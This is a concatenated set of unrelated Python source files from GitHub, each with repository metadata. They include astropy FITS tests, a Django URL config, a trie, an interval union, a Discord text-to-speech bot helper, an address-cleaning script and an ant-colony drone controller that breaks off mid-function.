Time):\n col2.format = col.format\n\n attrs = compare_attrs[name]\n compare_class = True\n\n if isinstance(col.info, QuantityInfo):\n # Downgrade Quantity to Column + unit\n assert type(col2) is Column\n # Class-specific attributes like `value` or `wrap_angle` are lost.\n attrs = [\"unit\"]\n compare_class = False\n # Compare data values here (assert_objects_equal doesn't know how in this case)\n assert np.all(col.value == col2)\n\n assert_objects_equal(col, col2, attrs, compare_class)\n\n\n@pytest.mark.parametrize(\"table_cls\", (Table, QTable))\ndef test_fits_mixins_as_one(table_cls, tmp_path):\n \"\"\"Test write/read all cols at once and validate intermediate column names\"\"\"\n filename = tmp_path / \"test_simple.fits\"\n names = sorted(mixin_cols)\n # FITS stores times directly, so we just get the column back.\n all_serialized_names = []\n for name in sorted(mixin_cols):\n all_serialized_names.extend(\n [name] if isinstance(mixin_cols[name], Time) else serialized_names[name]\n )\n t = table_cls([mixin_cols[name] for name in names], names=names)\n t.meta[\"C\"] = \"spam\"\n t.meta[\"comments\"] = [\"this\", \"is\", \"a\", \"comment\"]\n t.meta[\"history\"] = [\"first\", \"second\", \"third\"]\n\n t.write(filename, format=\"fits\")\n\n t2 = table_cls.read(filename, format=\"fits\", astropy_native=True)\n assert t2.meta[\"C\"] == \"spam\"\n assert t2.meta[\"comments\"] == [\"this\", \"is\", \"a\", \"comment\"]\n assert t2.meta[\"HISTORY\"] == [\"first\", \"second\", \"third\"]\n\n assert t.colnames == t2.colnames\n\n # Read directly via fits and confirm column names\n with fits.open(filename) as hdus:\n assert hdus[1].columns.names == all_serialized_names\n\n\n@pytest.mark.parametrize(\"name_col\", list(mixin_cols.items()))\n@pytest.mark.parametrize(\"table_cls\", (Table, QTable))\ndef 
test_fits_mixins_per_column(table_cls, name_col, tmp_path):\n    \"\"\"Test write/read one col at a time and do detailed validation\"\"\"\n    filename = tmp_path / \"test_simple.fits\"\n    name, col = name_col\n\n    c = [1.0, 2.0]\n    t = table_cls([c, col, c], names=[\"c1\", name, \"c2\"])\n    t[name].info.description = \"my \\n\\n\\n description\"\n    t[name].info.meta = {\"list\": list(range(50)), \"dict\": {\"a\": \"b\" * 200}}\n\n    if not t.has_mixin_columns:\n        pytest.skip(\"column is not a mixin (e.g. Quantity subclass in Table)\")\n\n    t.write(filename, format=\"fits\")\n    t2 = table_cls.read(filename, format=\"fits\", astropy_native=True)\n    if isinstance(col, Time):\n        # FITS Time does not preserve format\n        t2[name].format = col.format\n\n    assert t.colnames == t2.colnames\n\n    for colname in t.colnames:\n        compare = [\"data\"] if colname in (\"c1\", \"c2\") else compare_attrs[colname]\n        assert_objects_equal(t[colname], t2[colname], compare)\n\n    # Special case to make sure Column type doesn't leak into Time class data\n    if name.startswith(\"tm\"):\n        assert t2[name]._time.jd1.__class__ is np.ndarray\n        assert t2[name]._time.jd2.__class__ is np.ndarray\n\n\n@pytest.mark.parametrize(\"name_col\", unsupported_cols.items())\n@pytest.mark.xfail(reason=\"column type unsupported\")\ndef test_fits_unsupported_mixin(name_col, tmp_path):\n    # Check that we actually fail in writing unsupported columns defined\n    # on top.\n    filename = tmp_path / \"test_simple.fits\"\n    name, col = name_col\n    Table([col], names=[name]).write(filename, format=\"fits\")\n\n\ndef test_info_attributes_with_no_mixins(tmp_path):\n    \"\"\"Even if there are no mixin columns, if there is metadata that would be lost it still\n    gets serialized\n    \"\"\"\n    filename = tmp_path / \"test.fits\"\n    t = Table([[1.0, 2.0]])\n    t[\"col0\"].description = \"hello\" * 40\n    t[\"col0\"].format = \"{:8.4f}\"\n    t[\"col0\"].meta[\"a\"] = {\"b\": \"c\"}\n    t.write(filename, overwrite=True)\n\n    t2 = Table.read(filename)\n    assert t2[\"col0\"].description == \"hello\" * 40\n    assert t2[\"col0\"].format == \"{:8.4f}\"\n    assert t2[\"col0\"].meta[\"a\"] == {\"b\": \"c\"}\n\n\n@pytest.mark.parametrize(\"method\", [\"set_cols\", \"names\", \"class\"])\ndef test_round_trip_masked_table_serialize_mask(tmp_path, method):\n    \"\"\"\n    Same as previous test but set the serialize_method to 'data_mask' so mask is\n    written out and the behavior is all correct.\n    \"\"\"\n    filename = tmp_path / \"test.fits\"\n\n    t = simple_table(masked=True)  # int, float, and str cols with one masked element\n\n    # MaskedColumn but no masked elements. 
See the MaskedColumnInfo class\n    # _represent_as_dict() method for info about why we test a column with no masked elements.\n    t[\"d\"] = [1, 2, 3]\n\n    if method == \"set_cols\":\n        for col in t.itercols():\n            col.info.serialize_method[\"fits\"] = \"data_mask\"\n        t.write(filename)\n    elif method == \"names\":\n        t.write(\n            filename,\n            serialize_method={\n                \"a\": \"data_mask\",\n                \"b\": \"data_mask\",\n                \"c\": \"data_mask\",\n                \"d\": \"data_mask\",\n            },\n        )\n    elif method == \"class\":\n        t.write(filename, serialize_method=\"data_mask\")\n\n    t2 = Table.read(filename)\n    assert t2.masked is False\n    assert t2.colnames == t.colnames\n    for name in t2.colnames:\n        assert np.all(t2[name].mask == t[name].mask)\n        assert np.all(t2[name] == t[name])\n\n        # Data under the mask round-trips also (unmask data to show this).\n        t[name].mask = False\n        t2[name].mask = False\n        assert np.all(t2[name] == t[name])\n\n\ndef test_meta_not_modified(tmp_path):\n    filename = tmp_path / \"test.fits\"\n    t = Table(data=[Column([1, 2], \"a\", description=\"spam\")])\n    t.meta[\"comments\"] = [\"a\", \"b\"]\n    assert len(t.meta) == 1\n    t.write(filename)\n    assert len(t.meta) == 1\n    assert t.meta[\"comments\"] == [\"a\", \"b\"]\n\n\ndef test_is_fits_gh_14305():\n    \"\"\"Regression test for https://github.com/astropy/astropy/issues/14305\"\"\"\n    assert not connect.is_fits(\"\", \"foo.bar\", None)\n\n\ndef test_keep_masked_state_integer_columns(tmp_path):\n    \"\"\"Regression test for https://github.com/astropy/astropy/issues/15417\"\"\"\n    filename = tmp_path / \"test_masked.fits\"\n    t = Table([[1, 2], [1.5, 2.5]], names=[\"a\", \"b\"])\n    t[\"c\"] = MaskedColumn([1, 2], mask=[True, False])\n    t.write(filename)\n    tr = Table.read(filename)\n    assert not isinstance(tr[\"a\"], MaskedColumn)\n    assert not isinstance(tr[\"b\"], MaskedColumn)\n    assert isinstance(tr[\"c\"], MaskedColumn)\n\n\ndef test_null_propagation_in_table_read(tmp_path):\n    \"\"\"Checks that integer columns with a TNULL value set (e.g. 
masked columns)\n    have their TNULL value propagated when being read in by Table.read\"\"\"\n\n    # Could be anything except for 999999, which is the \"default\" fill_value\n    # for masked int arrays\n    NULL_VALUE = -1\n\n    output_filename = tmp_path / \"null_table.fits\"\n\n    data = np.asarray([1, 2, NULL_VALUE, 4], dtype=np.int32)\n\n    # Create table with BinTableHDU, with integer column containing a custom null\n    c = fits.Column(name=\"a\", array=data, null=NULL_VALUE, format=\"J\")\n    hdu = BinTableHDU.from_columns([c])\n    hdu.writeto(output_filename)\n\n    # Read the table in with Table.read, and ensure the column's fill_value is\n    # equal to NULL_VALUE\n    t = Table.read(output_filename)\n    assert t[\"a\"].fill_value == NULL_VALUE\n","repo_name":"astropy/astropy","sub_path":"astropy/io/fits/tests/test_connect.py","file_name":"test_connect.py","file_ext":"py","file_size_in_byte":39891,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"}
{"seq_id":"23424364293","text":"from django.conf.urls import url\nfrom testing import views\n\nurlpatterns=[\nurl(r'^register/$', views.register, name='register'),\nurl(r'^first/$', views.first),\nurl(r'^login/$', views.user_login, name='login'),\nurl(r'^logout/$', views.user_logout, name='logout'),\nurl(r'^owncourse/$',views.list,name=\"list\"),\nurl(r'^owncourse/(?P<pk>[0-9]+)/delete/$',views.coursedeleteview.as_view()),\nurl(r'^owncourse/(?P<pk>[0-9]+)/update/$',views.courseupdateview.as_view()),\nurl(r'^owncourse/(?P<pk>[0-9]+)/posts/$',views.postlist,name='posts'),\nurl(r'^owncourse/(?P<id>[0-9]+)/posts/(?P<pk>[0-9]+)/delete/$',views.postdeleteview.as_view()),\nurl(r'^owncourse/(?P<id>[0-9]+)/posts/(?P<pk>[0-9]+)/update/$',views.postupdateview.as_view()),\n#url(r'^addcourse/$',views.coursecreateview.as_view()),\n#url(r'^addposts/(?P<pk>[0-9]+)/$',views.postcreateview.as_view()),\n url(r'^join/$',views.allcourses,name=\"all\"),\nurl(r'^enroll/(?P<pk>[0-9]+)/$',views.enroll),\nurl(r'^unenroll/(?P<pk>[0-9]+)/$',views.unenroll),\nurl(r'^posts/(?P<pk>[0-9]+)/$',views.postdetail),\n ]\n","repo_name":"shilpathakur95/knowledgejar","sub_path":"testing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3139585475","text":"# A = (a, b)\n# L5 = all words have bab as a suffix\ndesc = 'todas as palavras possuem bab como sufixo'\n\nimport funcutils\n\nAteste = ['a', 'b']\nwteste = 'abababbabab'\n\ndef main(w, A):\n\ttry:\n\t\tfuncutils.analizAlfb(w, A)\n\t\t\n\t\tif w[len(w)-3:] != 'bab':\n\t\t\traise Exception('w inválida: palavra não termina com bab')\n\t\telse:\n\t\t\treturn [True, 0]\n\texcept Exception as e:\n\t\treturn [False, e]\n\t\n\t\nif __name__=='__main__':\n\tmain(wteste, Ateste)\n","repo_name":"felipegarcia99/reconhecimento-linguagens-formais","sub_path":"l5.py","file_name":"l5.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6063190541","text":"import csv\nimport json\n\nbooks_file = 'books.csv'\nusers_file = 'users.json'\nresult_file = 'result.json'\n\n\ndef get_books():\n    try:\n        with open(books_file, \"r\", encoding=\"utf-8\") as f:\n            books_raw = csv.DictReader(f)\n            books = [dict(filter(lambda key: key[0] != \"Publisher\", row.items())) for row in books_raw]\n            return books\n    except (Exception, IOError) as e:\n        print(e)\n\n\ndef get_users():\n    try:\n        with 
open(users_file, \"r\", encoding=\"utf-8\") as f:\n            users_raw = json.loads(f.read())\n            keys = (\"name\", \"gender\", \"address\", \"age\")\n            # users = [dict(filter(lambda key: key[0] in keys, row.items())) for row in users_raw]\n            # list(map(lambda d: d.update({\"books\": []}), users))\n            users = []\n            for user_data in users_raw:\n                user = {key: val for key, val in user_data.items() if key in keys}\n                users.append(\n                    user | {'books': []}\n                )\n            return users\n    except (Exception, IOError) as e:\n        print(e)\n\n\ndef distribute_books(users, books):\n    if isinstance(users, list) and isinstance(books, list):\n        i = 0\n        while i < len(books):\n            for user in users:\n                user[\"books\"].append(books[i])\n                i += 1\n                if i == len(books):\n                    break\n        return users\n\n\ndef write_result(result):\n    if isinstance(result, list):\n        try:\n            with open(result_file, \"w\", encoding=\"utf-8\") as f:\n                f.write(json.dumps(result, indent=4, ensure_ascii=False))\n                print(f'File {result_file} created')\n        except (Exception, IOError) as e:\n            print(e)\n    else:\n        print(f'File {result_file} was not created')\n\n\ndef main():\n    r = distribute_books(get_users(), get_books())\n    write_result(r)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"nevlaxgmailcom/python_otus_learning","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"12561913127","text":"from enum import Enum\nfrom collections import namedtuple\n\nclass State(Enum):\n    open = 1\n    closed = 2\n\nPoint = namedtuple('Point', ['val', 'state'])\n\nclass Interval(object):\n\n    def __init__(self, p1, p2):\n        self.p1, self.p2 = sorted([p1, p2], key = lambda p: p.val)\n\n    def __repr__(self):\n        left_b = '[ ' if self.p1.state == State.closed else '( '\n        right_b = ' ]' if self.p2.state == State.closed else ' )'\n        return left_b + str(self.p1.val) + ', ' + str(self.p2.val) + right_b\n\n    def __eq__(self, other):\n        return all([\n            self.p1.val == other.p1.val,\n            self.p1.state == other.p1.state,\n            self.p2.val == other.p2.val,\n            self.p2.state == other.p2.state\n        ])\n\n\ndef compute_union(intervals):\n    consolidation = []\n    if intervals:\n        ordered_intrvls = sorted(intervals, key = lambda intrvl: intrvl.p1.val)\n        start, end = ordered_intrvls[0].p1, ordered_intrvls[0].p2\n        for i in range(1, len(ordered_intrvls)):\n            intrvl = ordered_intrvls[i]\n\n            if intrvl.p1.val == start.val and intrvl.p1.state == State.closed:\n                start = Point(start.val, State.closed)\n\n            if intrvl.p1.val <= end.val and intrvl.p2.val >= end.val:\n                state = intrvl.p2.state\n                if intrvl.p2.val == end.val and end.state == State.closed:\n                    state = State.closed\n                end = Point(intrvl.p2.val, state)\n            elif intrvl.p1.val > end.val:\n                consolidation.append(Interval(start, end))\n                start, end = intrvl.p1, intrvl.p2\n\n        consolidation.append(Interval(start, end))\n\n    return consolidation\n\n","repo_name":"aburke/dragonstone","sub_path":"epi2/sorting_13_7.py","file_name":"sorting_13_7.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40441570681","text":"class TrieNode:\n    def __init__(self):\n        self.children = {}\n        self.end = False\n\nclass WordDictionary:\n\n    def __init__(self):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.root = TrieNode()\n\n    def addWord(self, word: str) -> None:\n        \"\"\"\n        Adds a word into the data structure.\n        \"\"\"\n        curr_node = self.root\n        for i, val in 
enumerate(word):\n            if val not in curr_node.children:\n                curr_node.children[val] = TrieNode()\n            curr_node = curr_node.children[val]\n        curr_node.end = True\n\n\n    def search(self, word: str) -> bool:\n        \"\"\"\n        Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n        \"\"\"\n        def dfs(node, i):\n            if i == len(word): return node.end\n\n            if word[i] == \".\":\n                for child in node.children:\n                    if dfs(node.children[child], i+1): return True\n\n            if word[i] in node.children:\n                return dfs(node.children[word[i]], i+1)\n\n            return False\n\n        return dfs(self.root, 0)\n\n\nfrom var_dump import var_dump\n\n# Your WordDictionary object will be instantiated and called as such:\nobj = WordDictionary()\nobj.addWord('bad')\nobj.addWord('dad')\nobj.addWord('mad')\n\n\nvar_dump(obj)\n# param_2 = obj.search(word)\n","repo_name":"samayisrael/django_python_dev","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"74881441651","text":"nums = [1,2,3,4,5]\nprint(nums)\nprint('-'*100)\n\ndis_similar = ['Rahman',22,True,70.2]\nprint(dis_similar)\nprint('-'*100)\n\n\nsame_data = [10]*5\nprint(same_data)\nprint('-'*100)\n\n# ACCESSING\nprint(nums)\n\nprint(nums[0])\n\nprint(nums[0:4])\nprint('-'*100)\n\n\n#LOOPING\nprint('USING FOR LOOP')\nanimals = ['tiger','lion','crocodile','zebra','cat','dog']\nfor i in animals:\n    print(i)\nprint('-'*100)\n\ni=0\nprint('USING WHILE LOOP')\nwhile(i<len(animals)):\n    print(animals[i])\n    i+=1\n\n'''\nPROPERTIES :\n    1. MUTABLE\n    2. CAN CONCATENATE\n    3. MERGEABLE\n    4. CONVERTIBLE FROM OTHER\n    5. ALIAS\n    6. CLONING\n    7. SEARCHING\n    8. IDENTITY\n    9. COMPARISON\n    10. 
EMPTINESS\n'''\n\nprop_check = [10,20,30,40,50]\n#1\nprop_check[0] = 'Rahman'\n#2\nprop_check = prop_check + [60,70,80]\n#3\nrandom_list = [100,110,120]\nmerged_list = prop_check + random_list\n#4\nchars = list(\"Rahman\")\n#5\nlist_1 = [1,2,3,4,5]\nlist_2 = list_1 # alias: both names refer to the same list\n#6\n# cloning (shallow copy)\nlist_3 = []\nlist_3 = list_3+list_1\n#7\nf = ['A','H','P','S','R']\nprint('R' in f)\n#8\nprint(list_1 is list_2)\n#9\na = [1,2,3,4]\nb = [1,2,5]\nprint(a<b)\n#10\nfull_list =[]\nif not full_list:\n print('Empty list')\n\n\n# BUILT IN FUNCTIONS \nlen(list_1)\nmax(list_1)\nmin(list_1)\nsum(a)\ndel(a[0])\nf.sort(reverse=False)\nf.reverse()\n\n#METHODS \nlist_1.append(99)\nlist_1.remove(99)\nlist_1.pop()\nlist_1.insert(0,99) # insert value 99 at index 0\nlist_1.count(99)\nlist_1.index(4)\n\n# LIST OF LISTS / 2D LISTS\ntwo_d = [[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]]\nprint(two_d)","repo_name":"mdrahmanabdul/Python-in-26-days","sub_path":"Day8-Lists/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23977468720","text":"import exstatic.warnings\n\n__all__ = ['errcodes', 'list_error_codes', 'create_error', 'reset_errors',\n 'get_errors', 'print_errors']\n\nerrcodes = {\n # Information.\n 'I001':'Function is a CSP process or server process',\n # Warnings.\n 'W001':'Channel in both readset and writeset.',\n 'W002':'No readset given in documentation.',\n 'W003':'No writeset given in documentation.',\n 'W004':'@process or @forever applied to method (rather than function)',\n # Errors.\n 'E001':'Process / forever decorator wraps a method, not a function.',\n 'E002':'Channel in readset is not a formal parameter to this process.',\n 'E003':'Channel in writeset is not a formal parameter to this process.',\n 'E004':'Channel appears in documented readset but not read from in function body.',\n 'E005':'Channel is read from in function body but does not appear in documented readset',\n 'E006':'Channel appears in documented writeset but not written to in function body.',\n 'E007':'Channel is written to in function body but does not appear in documented writeset'\n }\n\n\ncsp_error_list = exstatic.warnings.ExstaticErrorList(errcodes)\n\n\ndef list_error_codes():\n \"\"\"List all available error codes.\n \"\"\"\n sep = '--------------------------------------------------------------------'\n print ( sep )\n print ( ' CODE | MESSAGE' )\n codes = list(errcodes.keys())\n codes.sort()\n current_type = ''\n for key in codes:\n if key[0] != current_type:\n print ( sep )\n print ( str ( key ) + ': |' + str ( errcodes[key] ) )\n current_type = key[0]\n print ( sep )\n return\n\n\ndef create_error(filename, lineno, scope, errcode):\n \"\"\"Create a new error and add it to the list.\n \"\"\"\n return csp_error_list.create_error(filename, lineno, scope, errcode)\n\n\ndef reset_errors():\n \"\"\"Empty the current error list of all errors.\n \"\"\"\n csp_error_list.reset_errors()\n return\n\n\ndef get_errors(excluded=[]):\n \"\"\"Return the list of current errors.\n\n @return list of current errors.\n @type list\n \"\"\"\n return csp_error_list.get_errors(excluded=excluded)\n\ndef print_errors(excluded=[]):\n \"\"\"Print the list of current errors.\n \"\"\"\n csp_error_list.print_errors(excluded=excluded)\n 
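# nothing to return: printing is delegated to the shared ExstaticErrorList instance\n 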
return\n","repo_name":"futurecore/python-csp","sub_path":"exstatic/cspwarnings.py","file_name":"cspwarnings.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"21"} +{"seq_id":"36988786127","text":"from openpyxl import load_workbook\r\n\r\n##################### FUNÇÕES\r\n\r\ndef escrevecsv(string_completa):\r\n f2 = open('excel.csv','a',encoding=\"utf8\")\r\n f2.write(string_completa+\"\\n\")\r\n f2.close()\r\n\r\n\r\ndef salvaArquivo(file):\r\n book.save(file)\r\n \r\n\r\ndef retira_acentuacoes_erradas(string):\r\n return string.replace(\"Ô\",\"Ô\").replace(\"Ó\",\"Ó\").replace(\"Ê\",\"Ê\").replace(\"Ç\",\"Ç\").replace(\"Ü\",\"U\").replace(\"É\",\"É\").replace(\"Ã\",\"Ã\").replace(\"Ú\",\"Ú\")\r\n\r\ndef retira_espacamentos(string):\r\n return string.strip().replace('A VENIDA','AVENIDA').replace('JA RDIM','JARDIM').replace('JAR DIM','JARDIM')\r\n\r\ndef le_arquivo(letra):\r\n f = open(\"ENDEREÇOS CONTRIBUINTES DE GUARARAPES.txt\",\"r\",encoding=\"utf8\")\r\n f1 = f.readlines()\r\n\r\n contador=0 # contador da lista f1\r\n proxima_linha_rua=0 # variavel para trablhar com a proxima linha na mesma string\r\n proxima_linha_bairro=0 # somente bairro\r\n string_completa=\"\"\r\n\r\n contador1=0\r\n\r\n \r\n for linha in f1:\r\n if 'Cadastro:' in linha:\r\n continue\r\n\r\n if proxima_linha_rua == 1:\r\n ## Verifica se é rua + bairro OU somente rua\r\n\r\n if 'Cadastro:' in linha or linha.startswith(\"1\"):\r\n continue\r\n if 'RUA' in linha: \r\n if string_completa != \"\":\r\n \r\n rua=retira_acentuacoes_erradas(linha[0:linha.find(',')+7])\r\n if linha[linha.find(',')+7:-1] != \"\":\r\n # TEM BAIRRO\r\n string_completa+='|'+rua+'|'+ linha[linha.find(',')+7:-1]\r\n \r\n escrevecsv(string_completa)\r\n proxima_linha_rua=0\r\n continue\r\n proxima_linha_rua=0\r\n \r\n if proxima_linha_bairro == 1:\r\n string_completa+=retira_acentuacoes_erradas(linha.strip('\\n'))\r\n # chamar função para dar append ao arquivo .csv\r\n escrevecsv(string_completa)\r\n proxima_linha_bairro=0\r\n continue\r\n \r\n if linha.startswith(letra) and linha.split(' ')[0] != 'RUA' and 'RUA' in linha or linha.startswith(letra) and 'AVENIDA' in linha:\r\n contador1+=1\r\n if 'RUA' in linha:\r\n nome = retira_acentuacoes_erradas(linha[0:linha.find('RUA')])\r\n delimitador_virgula=linha.find(',')+7\r\n rua=retira_acentuacoes_erradas(linha[linha.find('RUA'):delimitador_virgula])\r\n \r\n # verifica se após a \",\" existe algo , ou seja, o BAIRRO;\r\n if linha[delimitador_virgula:-1] != \"\":\r\n # Bairro existe\r\n bairro=retira_acentuacoes_erradas((linha[delimitador_virgula:-1]))\r\n string_completa=nome+'|'+rua+'|'+bairro\r\n escrevecsv(string_completa)\r\n else:\r\n # Sem bairro\r\n # Preciso pegar a linha de baixo\r\n string_completa=nome+'|'+rua+'|'\r\n proxima_linha_bairro+=1\r\n \r\n elif 'AVENIDA' in linha:\r\n nome = retira_acentuacoes_erradas(linha[0:linha.find('AVENIDA')])\r\n delimitador_virgula=linha.find(',')+7\r\n avenida= retira_acentuacoes_erradas(linha[linha.find('AVENIDA'):delimitador_virgula])\r\n # verifica se após a \",\" existe algo , ou seja, o BAIRRO;\r\n if linha[delimitador_virgula:-1] != \"\":\r\n # Bairro existe\r\n bairro=retira_acentuacoes_erradas(linha[delimitador_virgula:-1])\r\n string_completa=nome+'|'+avenida+'|'+bairro\r\n escrevecsv(string_completa)\r\n else:\r\n # Sem bairro\r\n # Preciso pegar a linha de baixo\r\n string_completa=nome+'|'+avenida+'|'\r\n proxima_linha_bairro+=1\r\n \r\n else:\r\n if 
linha.startswith(letra) and linha.split(' ')[0] != \"RUA\":\r\n contador1+=1\r\n ## Se a rua estiver na linha de baixo\r\n string_completa=linha.strip('\\n') # Somente o nome\r\n proxima_linha_rua+=1\r\n continue\r\n \r\n\r\n################### FIM FUNÇÕES\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#################### MAIN CODE\r\n\r\n\r\n\r\nwhile 1:\r\n letra=input(\"~~> Qual letra deve-se procurar ?(0) para verificar os ceps \")\r\n if letra == \"0\":\r\n break\r\n le_arquivo(letra)\r\n\r\n\r\nprint(\"Modifique a extensão de excel.csv para excel.xlsx.\")\r\ninput(\"ENTER PARA PROSSEGUIR\")\r\n\r\nfile='excel.xlsx'\r\nbook=load_workbook(file)\r\nsheet=book[book.sheetnames[0]]\r\n\r\nprint(\"[+] Arrumando os cep's...\")\r\n\r\nfor i in range(1,sheet.max_row):\r\n string=\"C\"+str(i)\r\n valorA1=\"\"\r\n \r\n try:\r\n valorA1=retira_espacamentos(sheet[string].value.strip())\r\n except:\r\n continue\r\n \r\n if 'GUARARAPES - SP 16700000GUARARAPES - SP 16700000' in valorA1:\r\n novo_valor=valorA1.replace(\"GUARARAPES - SP 16700000GUARARAPES - SP 16700000\",\"GUARARAPES - SP 16700000\")\r\n sheet[string]=novo_valor\r\n salvaArquivo(file)\r\n elif 'GUARARAPES' in valorA1 or 'GUARA RAPES' in valorA1:\r\n print(valorA1)\r\n continue\r\n else:\r\n #'GUARARAPES' not in valorA1 or 'GUARA RAPES' not in valorA1:\r\n # nao tem guararapes. Adicione\r\n novo_valor=valorA1+ \" GUARARAPES - SP 16700000\"\r\n sheet[string]=novo_valor\r\n salvaArquivo(file)\r\n \r\n print(valorA1 + \"---> \"+novo_valor)\r\n\r\n\r\n\r\n","repo_name":"igorsoares/Mala-Direta","sub_path":"Mala-Direta-Guararapes.py","file_name":"Mala-Direta-Guararapes.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33159735221","text":"import asyncio\nimport time\nfrom typing import Optional\n\nimport discord\nimport gtts\nfrom discord import Message\n\nfrom template import Context\n\n\nasync def __play_audio_file(ctx: Context, path: str):\n # ensure author in a voice channel\n author_voice_state: Optional[discord.VoiceState] = ctx.msg.author.voice\n if author_voice_state is None:\n await __resp_error(ctx, f\"{ctx.msg.author.name}#{ctx.msg.author.discriminator} is not in any voice channel\")\n return\n # ensure author and bot in the same voice channel\n bot_voice_client: discord.VoiceClient = discord.utils.get(ctx.cli.voice_clients, guild=ctx.msg.guild)\n if bot_voice_client is None:\n await author_voice_state.channel.connect()\n elif bot_voice_client.channel != author_voice_state.channel:\n await bot_voice_client.disconnect()\n await author_voice_state.channel.connect()\n\n # play audio file\n bot_voice_client: discord.VoiceClient = discord.utils.get(ctx.cli.voice_clients, guild=ctx.msg.guild)\n bot_voice_client.stop()\n bot_voice_client.play(discord.FFmpegPCMAudio(source=path))\n\n # last voice access\n ctx.cfg.last_voice_access = int(time.time())\n await __schedule_disconnect_voice(ctx, bot_voice_client)\n\n\nasync def __tts(ctx: Context, text: str):\n gtts.gTTS(text=text, lang=ctx.cfg.lang).save(ctx.cfg.tts_path)\n\n\nasync def __parse_mention(ctx: Context, text: str) -> str:\n text = text.replace(\"!\", \"\")\n for user in ctx.msg.mentions:\n if user.nick is not None:\n nick = user.nick\n else:\n nick = user.name\n mention = user.mention\n mention = mention.replace(\"!\", \"\")\n text = text.replace(mention, nick)\n return text\n\n\nasync def __filter_banned_user(ctx: Context) -> bool:\n if ctx.msg.author.discriminator not in ctx.cfg.ban_list:\n 
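# author is not on the ban list, so let the message through\n 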
return False\n await __resp_warning(ctx, f\"{ctx.msg.author.name}#{ctx.msg.author.discriminator} has been banned\")\n return True\n\n\nasync def __resp_info(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**INFO**\",\n colour=0x00FF00,\n description=text,\n ).set_footer(text=\"INFO: intended use, need not to read\")))\n\n\nasync def __resp_warning(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**WARNING**\",\n colour=0xFFFF00,\n description=text,\n ).set_footer(text=\"WARNING: intended use, need to read\")))\n\n\nasync def __resp_error(ctx: Context, text: str):\n await __schedule_delete_message(ctx, await ctx.msg.channel.send(embed=discord.Embed(\n title=\"**ERROR**\",\n colour=0xFF0000,\n description=text,\n ).set_footer(text=\"ERROR: not intended use, need to read\")))\n\n\nasync def __schedule_disconnect_voice(ctx: Context, voice_client: discord.VoiceClient):\n \"\"\"schedule disconnecting voice after voice_timeout\"\"\"\n\n async def __disconnect_voice_task():\n \"\"\"task: disconnect voice after voice_timeout\"\"\"\n await asyncio.sleep(ctx.cfg.voice_timeout)\n elapsed = int(time.time()) - ctx.cfg.last_voice_access\n if voice_client.is_connected() and elapsed >= ctx.cfg.voice_timeout:\n await voice_client.disconnect()\n await __resp_info(ctx, \"voice has been disconnected due to inactivity\")\n\n asyncio.ensure_future(__disconnect_voice_task())\n\n\nasync def __schedule_delete_message(ctx: Context, msg: Message):\n \"\"\"schedule deleting message after resp_timeout\"\"\"\n\n async def __delete_message_task():\n \"\"\"task: delete message after resp_timeout\"\"\"\n await asyncio.sleep(ctx.cfg.resp_timeout)\n try:\n await msg.delete()\n except discord.errors.NotFound:\n pass\n\n asyncio.ensure_future(__delete_message_task())\n","repo_name":"khanh101/tts-bot","sub_path":"bot/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27247836310","text":"from domain.map import Map\nfrom domain.drone import Drone\nfrom domain.ant import Ant\nfrom domain.sensor_list import SensorList\nimport random\nfrom utils import *\nimport gui\n\n\nclass Controller:\n def __init__(self, map, drone):\n self.map = map\n self.drone = drone\n\n self.sensors = SensorList(self.map)\n self.pheromones = [[1.0 for _ in range(SENSOR_COUNT)] for _ in range(SENSOR_COUNT)]\n self.distances = self.sensors.get_distances_between_sensors()\n\n def move_ants(self, ants, alpha, beta, q0):\n \"\"\"\n Move all the ants\n :param ants: ants array\n :param alpha:\n :param beta:\n :param q0: the probability to pick the best solution\n :return: the ants that could travel to all the sensors.\n \"\"\"\n all_ants = [True for _ in ants]\n for i in range(len(ants)):\n ant = ants[i]\n for j in range(ANT_MOVES - 1):\n # if the ant can't perform a new move, we kill it\n possible_move = ant.next_move(self.distances, self.pheromones, q0, alpha, beta)\n if not possible_move:\n all_ants[i] = False\n break\n\n alive_ants = []\n for i in range(len(ants)):\n if all_ants[i]:\n ants[i].compute_fitness(self.distances)\n alive_ants.append(ants[i])\n return alive_ants\n\n def choose_best_ant(self, ants):\n \"\"\"\n choose the ant with the best fitness\n :param ants: the ants that travel to all the sensors.\n :return: the best ant\n \"\"\"\n best_ant = None\n best_fitness = 
